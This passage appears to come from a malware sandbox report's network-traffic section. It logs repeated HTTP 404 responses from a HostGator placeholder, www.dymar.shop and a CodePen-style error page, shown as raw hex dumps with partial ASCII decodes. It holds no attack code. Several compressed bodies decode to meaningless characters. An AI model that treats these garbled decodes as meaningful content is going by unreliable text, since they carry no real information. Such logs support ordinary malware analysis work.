6f 6d 20 44 6f 6d c3 ad 6e 69 6f 20 47 72 c3 a1 74 69 73 20 2d 20 48 6f 73 74 47 61 74 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f Data Ascii: 939<!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:51:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: OCSESSID=986a93ea4e1358e82a53132334; path=/Set-Cookie: language=ru-ru; expires=Thu, 02-Jan-2025 08:50:59 GMT; Max-Age=2592000; path=/; domain=www.dymar.shopSet-Cookie: currency=UAH; expires=Thu, 02-Jan-2025 08:50:59 GMT; Max-Age=2592000; path=/; domain=www.dymar.shopx-ray: wnp32698:0.140/wn32698:0.130/wa32698:D=134660Content-Encoding: brData Raw: 65 34 33 0d 0a 15 66 41 44 54 93 7a 00 8c d4 48 4d 73 7b 84 0c 73 df eb f2 b3 e7 bd 14 fd ac 72 d9 2f 1e 10 e0 73 d7 68 8f d3 7f ef 53 60 19 b4 1f 10 11 e0 6f 27 7d 99 a2 99 29 da 2c ea f4 b8 5f 43 d9 29 00 9c ed 26 83 12 99 ff da 5b cd ee 0c d9 9d 44 22 31 f2 42 34 1e 23 96 17 ba ab ba ff ec 54 ba dd da 7c 21 86 ee f7 fb f7 ff 13 2f 84 a8 48 d1 6d 9d 22 05 61 50 8a c2 82 15 b3 a8 93 20 2c 42 49 6c 0c cd 3d 34 2e 40 4e 30 fd 9a d4 c6 50 9b ab 33 15 03 88 78 60 fa df 10 23 c0 2a c9 7e 90 cf f6 00 bb fb 5f d9 ee 6c dc 01 6b f8 aa b8 ab 79 af 8f 77 75 73 26 fc 58 cf c3 59 b3 16 a5 2c 87 cd d2 6c 26 27 e5 50 12 28 c0 c4 ee fe b4 b5 98 24 a8 54 ca 2d 14 07 3c fa 3a 15 00 6c 6b db 5e 82 37 75 26 c4 ff 20 5b e8 7a 1f 09 e0 05 74 cd 7d f6 e7 46 fb 50 e0 ef 2b 20 52 00 ab 54 f2 60 37 96 09 3d e0 8d d4 01 95 e6 14 84 6c 68 4d 8e 96 4c 0e ab 67 20 7d ea ed 33 59 2c 0a 82 46 7c 49 34 7f 8f f6 98 09 21 52 a9 13 bb fb 99 26 54 45 17 02 a0 56 2b 2c 3e 83 47 44 64 08 08 0d a2 02 00 f3 5c 44 3c 20 00 ca 84 3f ec 0b e4 c9 11 86 0a d7 d6 86 2b 04 fa 19 c4 90 24 22 1b 19 49 69 59 91 4c 44 7e 31 ba 84 93 89 e0 72 7b 3f 78 dd 81 93 8e 59 17 36 b6 45 45 c6 6f ec b0 88 a6 e7 08 38 3b 7e ea ba 71 ea f2 ce 6b 61 7f 7d 65 7a d7 98 67 2f 32 f4 33 60 5a 24 f8 1e 11 c1 44 50 5d 88 8a 71 83 01 d5 08 85 da a8 71 cd 3e 84 cc d7 75 67 fb ba 6b ea 4f 6e ea f0 57 66 bb 76 30 fe 7a 2c e5 2c 96 d2 ce 90 d2 a4 81 d2 bc 3c 2f ad ca ab d2 a6 b4 89 41 1a 71 8b d7 b2 09 62 25 af cd c4 3f ee 87 49 18 87 31 03 43 10 44 c0 9b ec b5 38 9d a2 ed cf bb 3c 2b 72 45 e4 d6 49 88 17 a3 7c 57 58 21 9d 9f 4f e1 6e 24 aa db 3f c0 86 e9 ae 2d 05 01 51 c4 72 18 74 ec 43 49 af 83 41 97 08 f6 61 75 19 fe ec a7 b0 3b d6 5f 85 06 09 f2 6a a5 2e 32 3d e8 12 eb b1 a3 40 29 43 11 8c d5 bf fb 21 ca 77 eb e5 d3 67 17 2f 3f dc a5 42 97 bd 51 fd 12 80 15 6a c3 4b 2d 3e f5 44 9f 8d 1f 22 9c 68 5e 22 09 72 e8 41 03 aa 9a 9d 4c ff 4d 47 43 a6 1e 5b cc d4 5a 4a e0 f1 27 fc f9 b3 ff 73 06 ad b9 82 7b 7a 30 93 e9 f4 86 b9 a0 12 d0 e0 0a 66 8c d7 64 f3 67 42 87 ef 8c 7b fe a0 88 58 e4 c2 5d ae e8 76 43 01 aa aa 80 a1 30 24 03 0a df 4d 9a a5 8f 9c 55 54 3d 65 9f 7b 1f 9f de 7e f5 bb 75 7a a2 c4 54 ca 53 2a a5 15 15 58 99 bd 3e 4c b8 55 de 7c 2a 65 9e e1 eb 47 b7 65 35 bc a6 1a 01 eb 69 c3 8a ab 13 8c 9b ac ed e0 8b 60 71 ed Data Ascii: e43fADTzHMs{sr/shS`o'}),_C)&[D"1B4#T|!/Hm"aP ,BIl=4.@N0P3x`#*~
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:51:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: OCSESSID=cec7612f96f92161a6b10eaedb; path=/Set-Cookie: language=ru-ru; expires=Thu, 02-Jan-2025 08:51:02 GMT; Max-Age=2592000; path=/; domain=www.dymar.shopSet-Cookie: currency=UAH; expires=Thu, 02-Jan-2025 08:51:02 GMT; Max-Age=2592000; path=/; domain=www.dymar.shopx-ray: wnp32698:0.140/wn32698:0.130/wa32698:D=129239Content-Encoding: brData Raw: 65 34 33 0d 0a 15 66 41 44 54 93 7a 00 8c d4 48 4d 73 7b 84 0c 73 df eb f2 b3 e7 bd 14 fd ac 72 d9 2f 1e 10 e0 73 d7 68 8f d3 7f ef 53 60 19 b4 1f 10 11 e0 6f 27 7d 99 a2 99 29 da 2c ea f4 b8 5f 43 d9 29 00 9c ed 26 83 12 99 ff da 5b cd ee 0c d9 9d 44 22 31 f2 42 34 1e 23 96 17 ba ab ba ff ec 54 ba dd da 7c 21 86 ee f7 fb f7 ff 13 2f 84 a8 48 d1 6d 9d 22 05 61 50 8a c2 82 15 b3 a8 93 20 2c 42 49 6c 0c cd 3d 34 2e 40 4e 30 fd 9a d4 c6 50 9b ab 33 15 03 88 78 60 fa df 10 23 c0 2a c9 7e 90 cf f6 00 bb fb 5f d9 ee 6c dc 01 6b f8 aa b8 ab 79 af 8f 77 75 73 26 fc 58 cf c3 59 b3 16 a5 2c 87 cd d2 6c 26 27 e5 50 12 28 c0 c4 ee fe b4 b5 98 24 a8 54 ca 2d 14 07 3c fa 3a 15 00 6c 6b db 5e 82 37 75 26 c4 ff 20 5b e8 7a 1f 09 e0 05 74 cd 7d f6 e7 46 fb 50 e0 ef 2b 20 52 00 ab 54 f2 60 37 96 09 3d e0 8d d4 01 95 e6 14 84 6c 68 4d 8e 96 4c 0e ab 67 20 7d ea ed 33 59 2c 0a 82 46 7c 49 34 7f 8f f6 98 09 21 52 a9 13 bb fb 99 26 54 45 17 02 a0 56 2b 2c 3e 83 47 44 64 08 08 0d a2 02 00 f3 5c 44 3c 20 00 ca 84 3f ec 0b e4 c9 11 86 0a d7 d6 86 2b 04 fa 19 c4 90 24 22 1b 19 49 69 59 91 4c 44 7e 31 ba 84 93 89 e0 72 7b 3f 78 dd 81 93 8e 59 17 36 b6 45 45 c6 6f ec b0 88 a6 e7 08 38 3b 7e ea ba 71 ea f2 ce 6b 61 7f 7d 65 7a d7 98 67 2f 32 f4 33 60 5a 24 f8 1e 11 c1 44 50 5d 88 8a 71 83 01 d5 08 85 da a8 71 cd 3e 84 cc d7 75 67 fb ba 6b ea 4f 6e ea f0 57 66 bb 76 30 fe 7a 2c e5 2c 96 d2 ce 90 d2 a4 81 d2 bc 3c 2f ad ca ab d2 a6 b4 89 41 1a 71 8b d7 b2 09 62 25 af cd c4 3f ee 87 49 18 87 31 03 43 10 44 c0 9b ec b5 38 9d a2 ed cf bb 3c 2b 72 45 e4 d6 49 88 17 a3 7c 57 58 21 9d 9f 4f e1 6e 24 aa db 3f c0 86 e9 ae 2d 05 01 51 c4 72 18 74 ec 43 49 af 83 41 97 08 f6 61 75 19 fe ec a7 b0 3b d6 5f 85 06 09 f2 6a a5 2e 32 3d e8 12 eb b1 a3 40 29 43 11 8c d5 bf fb 21 ca 77 eb e5 d3 67 17 2f 3f dc a5 42 97 bd 51 fd 12 80 15 6a c3 4b 2d 3e f5 44 9f 8d 1f 22 9c 68 5e 22 09 72 e8 41 03 aa 9a 9d 4c ff 4d 47 43 a6 1e 5b cc d4 5a 4a e0 f1 27 fc f9 b3 ff 73 06 ad b9 82 7b 7a 30 93 e9 f4 86 b9 a0 12 d0 e0 0a 66 8c d7 64 f3 67 42 87 ef 8c 7b fe a0 88 58 e4 c2 5d ae e8 76 43 01 aa aa 80 a1 30 24 03 0a df 4d 9a a5 8f 9c 55 54 3d 65 9f 7b 1f 9f de 7e f5 bb 75 7a a2 c4 54 ca 53 2a a5 15 15 58 99 bd 3e 4c b8 55 de 7c 2a 65 9e e1 eb 47 b7 65 35 bc a6 1a 01 eb 69 c3 8a ab 13 8c 9b ac ed e0 8b 60 71 ed Data Ascii: e43fADTzHMs{sr/shS`o'}),_C)&[D"1B4#T|!/Hm"aP ,BIl=4.@N0P3x`#*~
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:51:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: OCSESSID=cbe2e68023be194cdea8c481f5; path=/Set-Cookie: language=ru-ru; expires=Thu, 02-Jan-2025 08:51:05 GMT; Max-Age=2592000; path=/; domain=www.dymar.shopSet-Cookie: currency=UAH; expires=Thu, 02-Jan-2025 08:51:05 GMT; Max-Age=2592000; path=/; domain=www.dymar.shopx-ray: wnp32698:0.120/wn32698:0.120/wa32698:D=115771Content-Encoding: brData Raw: 65 34 33 0d 0a 15 66 41 44 54 93 7a 00 8c d4 48 4d 73 7b 84 0c 73 df eb f2 b3 e7 bd 14 fd ac 72 d9 2f 1e 10 e0 73 d7 68 8f d3 7f ef 53 60 19 b4 1f 10 11 e0 6f 27 7d 99 a2 99 29 da 2c ea f4 b8 5f 43 d9 29 00 9c ed 26 83 12 99 ff da 5b cd ee 0c d9 9d 44 22 31 f2 42 34 1e 23 96 17 ba ab ba ff ec 54 ba dd da 7c 21 86 ee f7 fb f7 ff 13 2f 84 a8 48 d1 6d 9d 22 05 61 50 8a c2 82 15 b3 a8 93 20 2c 42 49 6c 0c cd 3d 34 2e 40 4e 30 fd 9a d4 c6 50 9b ab 33 15 03 88 78 60 fa df 10 23 c0 2a c9 7e 90 cf f6 00 bb fb 5f d9 ee 6c dc 01 6b f8 aa b8 ab 79 af 8f 77 75 73 26 fc 58 cf c3 59 b3 16 a5 2c 87 cd d2 6c 26 27 e5 50 12 28 c0 c4 ee fe b4 b5 98 24 a8 54 ca 2d 14 07 3c fa 3a 15 00 6c 6b db 5e 82 37 75 26 c4 ff 20 5b e8 7a 1f 09 e0 05 74 cd 7d f6 e7 46 fb 50 e0 ef 2b 20 52 00 ab 54 f2 60 37 96 09 3d e0 8d d4 01 95 e6 14 84 6c 68 4d 8e 96 4c 0e ab 67 20 7d ea ed 33 59 2c 0a 82 46 7c 49 34 7f 8f f6 98 09 21 52 a9 13 bb fb 99 26 54 45 17 02 a0 56 2b 2c 3e 83 47 44 64 08 08 0d a2 02 00 f3 5c 44 3c 20 00 ca 84 3f ec 0b e4 c9 11 86 0a d7 d6 86 2b 04 fa 19 c4 90 24 22 1b 19 49 69 59 91 4c 44 7e 31 ba 84 93 89 e0 72 7b 3f 78 dd 81 93 8e 59 17 36 b6 45 45 c6 6f ec b0 88 a6 e7 08 38 3b 7e ea ba 71 ea f2 ce 6b 61 7f 7d 65 7a d7 98 67 2f 32 f4 33 60 5a 24 f8 1e 11 c1 44 50 5d 88 8a 71 83 01 d5 08 85 da a8 71 cd 3e 84 cc d7 75 67 fb ba 6b ea 4f 6e ea f0 57 66 bb 76 30 fe 7a 2c e5 2c 96 d2 ce 90 d2 a4 81 d2 bc 3c 2f ad ca ab d2 a6 b4 89 41 1a 71 8b d7 b2 09 62 25 af cd c4 3f ee 87 49 18 87 31 03 43 10 44 c0 9b ec b5 38 9d a2 ed cf bb 3c 2b 72 45 e4 d6 49 88 17 a3 7c 57 58 21 9d 9f 4f e1 6e 24 aa db 3f c0 86 e9 ae 2d 05 01 51 c4 72 18 74 ec 43 49 af 83 41 97 08 f6 61 75 19 fe ec a7 b0 3b d6 5f 85 06 09 f2 6a a5 2e 32 3d e8 12 eb b1 a3 40 29 43 11 8c d5 bf fb 21 ca 77 eb e5 d3 67 17 2f 3f dc a5 42 97 bd 51 fd 12 80 15 6a c3 4b 2d 3e f5 44 9f 8d 1f 22 9c 68 5e 22 09 72 e8 41 03 aa 9a 9d 4c ff 4d 47 43 a6 1e 5b cc d4 5a 4a e0 f1 27 fc f9 b3 ff 73 06 ad b9 82 7b 7a 30 93 e9 f4 86 b9 a0 12 d0 e0 0a 66 8c d7 64 f3 67 42 87 ef 8c 7b fe a0 88 58 e4 c2 5d ae e8 76 43 01 aa aa 80 a1 30 24 03 0a df 4d 9a a5 8f 9c 55 54 3d 65 9f 7b 1f 9f de 7e f5 bb 75 7a a2 c4 54 ca 53 2a a5 15 15 58 99 bd 3e 4c b8 55 de 7c 2a 65 9e e1 eb 47 b7 65 35 bc a6 1a 01 eb 69 c3 8a ab 13 8c 9b ac ed e0 8b 60 71 ed Data Ascii: e43fADTzHMs{sr/shS`o'}),_C)&[D"1B4#T|!/Hm"aP ,BIl=4.@N0P3x`#*~
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:51:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: OCSESSID=e1c60ec7c81c2baf585215f2f9; path=/Set-Cookie: language=ru-ru; expires=Thu, 02-Jan-2025 08:51:08 GMT; Max-Age=2592000; path=/; domain=www.dymar.shopSet-Cookie: currency=UAH; expires=Thu, 02-Jan-2025 08:51:08 GMT; Max-Age=2592000; path=/; domain=www.dymar.shopx-ray: wnp32698:0.130/wn32698:0.130/wa32698:D=129196Data Raw: 34 33 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 79 6d 61 72 2e 73 68 6f 70 22 20 2f 3e 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e d0 97 d0 b0 d0 bf d1 80 d0 b0 d1 88 d0 b8 d0 b2 d0 b0 d0 b5 d0 bc d0 b0 d1 8f 20 d1 81 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 21 3c 2f 74 69 74 6c 65 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 79 6d 61 72 2e 73 68 6f 70 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 61 74 61 6c 6f 67 2f 76 69 65 77 2f 6a 61 76 61 73 63 72 69 70 74 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 61 74 61 6c 6f 67 2f 76 69 65 77 2f 6a 61 76 61 73 63 72 69 70 74 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 Data Ascii: 4375<!DOCTYPE html><!--[if IE]><![endif]--><!--[if IE 8 ]><html dir="ltr" lang="ru" class="ie8"><![endif]--><!--[i
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Tue, 03 Dec 2024 08:51:30 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:52:02 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:52:05 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:52:08 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 